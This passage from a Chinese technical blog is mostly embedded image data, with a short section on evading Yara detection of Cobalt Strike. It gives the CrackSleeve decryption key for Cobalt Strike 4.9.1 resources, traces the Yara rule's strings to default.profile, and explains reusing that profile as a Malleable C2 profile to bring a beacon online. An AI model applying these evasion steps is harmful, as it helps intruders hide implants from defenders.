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
</p>
<h2 id=0x03-反狩猎>
 0x03 反狩猎
 <a class=heading-link href=#0x03-%e5%8f%8d%e7%8b%a9%e7%8c%8e>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h2>
<p>针对以上问题，CobaltStrike官方在<a href=https://www.cobaltstrike.com/blog/cobalt-strike-and-yara-can-i-have-your-signature class=external-link target=_blank rel=noopener>博客</a>中提供了一些解决方法</p>
<h3 id=0x031-yara-bypass>
 0x031 Yara bypass
 <a class=heading-link href=#0x031-yara-bypass>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h3>
<h4 id=0x0311-字符串处理>
 0x0311 字符串处理
 <a class=heading-link href=#0x0311-%e5%ad%97%e7%ac%a6%e4%b8%b2%e5%a4%84%e7%90%86>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h4>
<p>可以看到Windows_Trojan_CobaltStrike_ee756db7匹配了很多字符串，我决定先看看这些字符串都是从哪里来的。</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>CobaltStrike在4.x之后，会把资源文件加密存放到cobaltstrike-client端的sleeve目录中，需要使用<a href=https://github.com/ca3tie1/CrackSleeve class=external-link target=_blank rel=noopener>CrackSleeve</a>对资源文件进行解密</p>
<p>CobaltStrike4.9.1的key如下，需要自行替换一下</p>
<div class=highlight><pre tabindex=0 style=color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-java data-lang=java><span style=display:flex><span><span style=color:#ff7b72>private</span><span style=color:#6e7681> </span><span style=color:#ff7b72>static</span><span style=color:#6e7681> </span><span style=color:#ff7b72>byte</span><span style=color:#ff7b72;font-weight:bold>[]</span><span style=color:#6e7681> </span>OriginKey<span style=color:#6e7681> </span><span style=color:#ff7b72;font-weight:bold>=</span><span style=color:#6e7681> </span>{<span style=color:#ff7b72;font-weight:bold>-</span>1,<span style=color:#6e7681> </span>12,<span style=color:#6e7681> </span><span style=color:#ff7b72;font-weight:bold>-</span>6,<span style=color:#6e7681> </span>65,<span style=color:#6e7681> </span>7,<span style=color:#6e7681> </span><span style=color:#ff7b72;font-weight:bold>-</span>47,<span style=color:#6e7681> </span>91,<span style=color:#6e7681> </span>48,<span style=color:#6e7681> </span>17,<span style=color:#6e7681> </span>61,<span style=color:#6e7681> </span>29,<span style=color:#6e7681> </span>43,<span style=color:#6e7681> </span><span style=color:#ff7b72;font-weight:bold>-</span>99,<span style=color:#6e7681> </span><span style=color:#ff7b72;font-weight:bold>-</span>23,<span style=color:#6e7681> </span>21,<span style=color:#6e7681> </span>109};<span style=color:#6e7681>
</span></span></span><span style=display:flex><span><span style=color:#6e7681></span><span style=color:#ff7b72>private</span><span style=color:#6e7681> </span><span style=color:#ff7b72>static</span><span style=color:#6e7681> </span><span style=color:#ff7b72>byte</span><span style=color:#ff7b72;font-weight:bold>[]</span><span style=color:#6e7681> </span>CustomizeKey<span style=color:#6e7681> </span><span style=color:#ff7b72;font-weight:bold>=</span><span style=color:#6e7681> </span>{<span style=color:#ff7b72;font-weight:bold>-</span>1,<span style=color:#6e7681> </span>12,<span style=color:#6e7681> </span><span style=color:#ff7b72;font-weight:bold>-</span>6,<span style=color:#6e7681> </span>65,<span style=color:#6e7681> </span>7,<span style=color:#6e7681> </span><span style=color:#ff7b72;font-weight:bold>-</span>47,<span style=color:#6e7681> </span>91,<span style=color:#6e7681> </span>48,<span style=color:#6e7681> </span>17,<span style=color:#6e7681> </span>61,<span style=color:#6e7681> </span>29,<span style=color:#6e7681> </span>43,<span style=color:#6e7681> </span><span style=color:#ff7b72;font-weight:bold>-</span>99,<span style=color:#6e7681> </span><span style=color:#ff7b72;font-weight:bold>-</span>23,<span style=color:#6e7681> </span>21,<span style=color:#6e7681> </span>109};<span style=color:#6e7681>
</span></span></span></code></pre></div><p>对cobaltstrike-client及解密的Resource进行搜索，最后在default.profile发现了结果，而且与Windows_Trojan_CobaltStrike_ee756db7匹配的规则一致</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>把他复制出来，并删除stage里面内容作为Malleable-C2来使用，重新启动server，生成beacon上线</p>
<p><img loading=lazy src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABmAAAAMHCAIAAAChVg9TAAAgAElEQVR4nOydd3wc1bn3n3Nmu3rvklUs25IlWZJ7tzEuYDAYMAQDCeSGmxBCEtLzJpeEwE27kJDkkkDIDSR0THHvvVuyZblLtiSrayWtyq60fea8f0w7s7sqLoCB8/2AvDs7c85znjM7s/vb53kOKpxaDAAARBAAgCBAhAgAQORnAAQIAgBC5M2EIABCCCEACAAAISAEkLQPICQ2CQQApF2kx9LOQO9AAIAIBAghAuF5Ivh4nhd4r8ALhPCE5wkvEEJAEARCgBAAQiQ75EbEhwBIeaT2B0AoG2hjkPQHA0YII4QR1mGEMeIQxhgjBIAQRpg6UP5nKJDSMdUjIqJlAGik49VmtEPQ9oAACCBA4nSpgxE7Ef0/VEf0nIyiXyQPnlBPle6UOVYPR/RW0T6EEAQ0gwJHp24HBETrJ0KZAfRkUE+V4Ysnn3Qiir6ihxTUMcgdk2DPyK2B1m0BPgF5jmUT6GkmAIhQAyJBvle7pocpj4UQhBCR3l1BA5fHKL6nNA1Lby3J+UMMeyhHqMdo5iXQjQgCvAsk2JPqCUEIIGnmkcZWROR50rRPlBMFASGAkfhWRxgFjIU6r+TZVxqg/IHoISB5quhWghtF2qkPOBWBngW5VdkN9Ouqb9TWxbMTgdatQSCgdhL/SH5XzzmqdaSaqXXN0A+oa7JqgMaR8ikp9yndGcSJk6821BUoxAkX8AYN9CP1gnbo6ptD2Tf4rXB1IITEASpvU3FjgH+kt2/wjNNnf6BBCEK8JyHUnkO9gBBS/C3dJKnXAEA0nhD5tJfuywjJ7zJCBMILAi8QP8/zPp538X63AEAQIRhhjBDiOM5owAa9z+syGcEcYQEEg/1Oe2efOVzH6VBMnHnspHTACCFEBHlY6l0eBRhGXykC3tG8wHe19bdc6rP3+oggRCdFmsKMwV7QnDjaDxiKw6X7HygvyaZIb3/qyqE0Kh4ZcA/WXN/UPkFzMgbfFGkztRcY7cUCydf+gNuFloAbW4DtmlsH9apmNwQACEsngMYsBMplTnZOYI8IpHs0fcuQrtdKKyHem4TQgyfKbkTjCpCdoF6ixc9tSHYzQdTnBc0Vlmj6U24eao9D3doCr3/BU6g9atgLcFCboW4AQM2zfMWgelZOKOUMJJRZ9M1iyN209invQfX9F+rCPgIhb2SKxaC8MQJnhAQcojmpNCcoEYh8p5UbUZykaVlxEpG7pgdNQoxI7oYEuEVz6gXNOj12emPAWRLShyFPAbHLgPuXvE05+5WrJhDpsiCNQW6EDNXpMATtH+DTkI1RvYcaYMD4hugCgq9ZAddtCLWfcj0KHsIQt0W1ZXlP2ut0l0idBRI008oZGWrARPpuK18CkXLpVk4y9SJMfZ2hroDKF2C6aaK8QSHwS4B0tZQv6QEMeR4E3HLUEQR9YaIbGKK5ofcIfGtS79BRmaltKnha6XMo+HwK9Zj2tPyul50XbMZQV0KqCZBuP8rlSNmIlA8bCAEBBPT9W70eAlJUD+XYgNEFXi5og+n3DQAAQdRFAgDoSwSo9/UQLg++KKk3D+p1BNLJG3ANB/rTBvXe0r5jlBNVfko0D4E6AEDxmdYC1Ujq2im9m9Ru6Dcroo6WbCfSx2K5JeVdT0igY2joGyWtEAS5UnaD8nBKzjRQr+RCfX/z8D0xGAwGg8FgMBgMBoPBYHx2QQiF44kAiJJgsFYdlX57JCD9GCeqO5KoDxgAFOEF0aKUqrcQ6SUSpKeGUK4JiD+CqjqR9IcASDaq0iVRdD3xWDVUAIH4G5TWjJCypaqGURqbepws7Kr6nmIbIQQpcj+AEj2FkPIbIREDJMQ91V40ZhEAwAgT2aECFUMgS9WKIocIJZPTotYohFtq2HJQh6J7A6hxVjpbnBSI5WzpMJos0TEJ6i